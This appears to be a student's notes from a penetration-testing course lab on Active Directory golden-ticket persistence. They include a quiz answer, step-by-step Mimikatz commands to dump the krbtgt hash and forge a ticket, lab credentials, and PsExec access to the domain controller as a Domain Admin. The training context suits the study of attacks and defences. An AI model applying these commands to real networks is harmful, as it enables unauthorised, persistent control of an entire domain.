Topics: Golden Tickets
# Questions 1
Start VM Group 1 and repeat the steps discussed in this section. Which user's NTLM hash do we need to abuse in order to forge a golden ticket?
# Answer
krbtgt

# Returning to the explanation of Kerberos authentication, we'll recall that when a user submits a request for a TGT, the KDC encrypts the TGT with a secret key known only to the KDCs in the domain. This secret key is the password hash of a domain user account called krbtgt.

# If we can get our hands on the krbtgt password hash, we could create our own self-made custom TGTs, also known as golden tickets.

# Although this technique's name resembles the Silver Ticket one that we encountered in the Attacking Authentication Module, Golden Tickets provide a more powerful attack vector. While Silver Tickets aim to forge a TGS ticket to access a specific service, Golden Tickets give us permission to access the entire domain's resources

# We could create a TGT stating that a non-privileged user is a member of the Domain Admins group, and the domain controller will trust it because it is correctly encrypted. This provides a neat way of keeping persistence in an Active Directory environment, but the best advantage is that the krbtgt account password is not automatically changed.

NOTE: We must carefully protect stolen krbtgt password hashes because they grant unlimited domain access. Consider explicitly obtaining the client's permission before executing this technique

# This password is only changed when the domain functional level is upgraded from a pre-2008 Windows server, but not from a newer version. Because of this, it is not uncommon to find very old krbtgt password hashes.

NOTE: The Domain Functional Level dictates the capabilities of the domain and determines which Windows operating systems can be run on the domain controller. Higher functional levels enable additional features, functionality, and security mitigations.

# To test this persistence technique, we will first attempt to laterally move from the Windows 11 CLIENT74 workstation to the domain controller via PsExec as the jen user by spawning a traditional command shell with the cmd command.

xfreerdp /cert-ignore /u:jen /p:Nexus123! /d:corp.com /v:192.168.175.74

C:\Tools\SysinternalsSuite> PsExec64.exe \\DC1 cmd.exe
...
Couldn't access DC1:
Access is denied.
...

# At this stage of the engagement, the golden ticket will require us to have access to a Domain Admin's group account or to have compromised the domain controller itself to work as a persistence method. With this kind of access, we can extract the password hash of the krbtgt account with Mimikatz.

# To simulate this, we'll log in to the domain controller with remote desktop using the jeffadmin account. Then we will run Mimikatz from C:\Tools, and issue the lsadump::lsa command as displayed below:
xfreerdp /cert-ignore /u:jeffadmin /p:BrouhahaTungPerorateBroom2023! /d:corp.com /v:192.168.175.70

C:\Tools> .\mimikatz.exe
mimikatz # privilege::debug
mimikatz # lsadump::lsa /patch
...
Domain : CORP / S-1-5-21-1987370270-658905905-1781884369
RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 1693c6cefafffc7af11ef34d1c788f47
...

# Having obtained the NTLM hash of the krbtgt account, along with the domain SID, we can now forge and inject our golden ticket. Creating the golden ticket and injecting it into memory does not require any administrative privileges and can even be performed from a computer that is not joined to the domain. We'll take the hash and continue the procedure from a compromised workstation.

# Let's move back to CLIENT74 as the jen user. Before we generate the golden ticket let's launch mimikatz and delete any existing Kerberos tickets with kerberos::purge.
xfreerdp /cert-ignore /u:jen /p:Nexus123! /d:corp.com /v:192.168.175.74

mimikatz # privilege::debug
mimikatz # kerberos::purge

# Now, we'll supply the domain SID (which we can gather with whoami /user) to the Mimikatz kerberos::golden command to create the golden ticket.

# This time, we'll use the /krbtgt option instead of /rc4 to indicate we are supplying the password hash of the krbtgt user account. Starting July 2022, Microsoft improved the authentication process, so we'll need to provide an existing account. Let's set the golden ticket's username to jen. Before it didn't matter if the account existed.

mimikatz # kerberos::golden /user:jen /domain:corp.com /sid:S-1-5-21-1987370270-658905905-1781884369 /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt
...
User Id   : 500
-> Ticket : ** Pass The Ticket **
Golden ticket for 'jen @ corp.com' successfully submitted for current session
...
mimikatz # misc::cmd

# Mimikatz provides two sets of default values when using the golden ticket option: the user ID and the groups ID. The user ID is set to 500 by default, which is the RID of the built-in administrator for the domain. The values for the groups ID consist of the most privileged groups in Active Directory, including the Domain Admins group. With the golden ticket injected into memory, let's use PsExec_ to launch a new command prompt with misc::cmd.

C:\Tools\SysinternalsSuite>.\PsExec.exe \\dc1 cmd.exe
C:\Windows\system32>hostname
DC1

# We now have an interactive command prompt on the domain controller. Now let's use the whoami command to verify that our user jen is now part of the Domain Admin group.
C:\Windows\system32>whoami /groups
...
p, Enabled by default, Enabled group
CORP\Domain Admins 
...

# If we were to connect PsExec to the IP address of the domain controller instead of the hostname, we would instead force the use of NTLM authentication and access would still be blocked.
C:\Tools\SysinternalsSuite> psexec.exe \\192.168.50.70 cmd.exe
...
Couldn't access 192.168.50.70:
Access is denied.
...

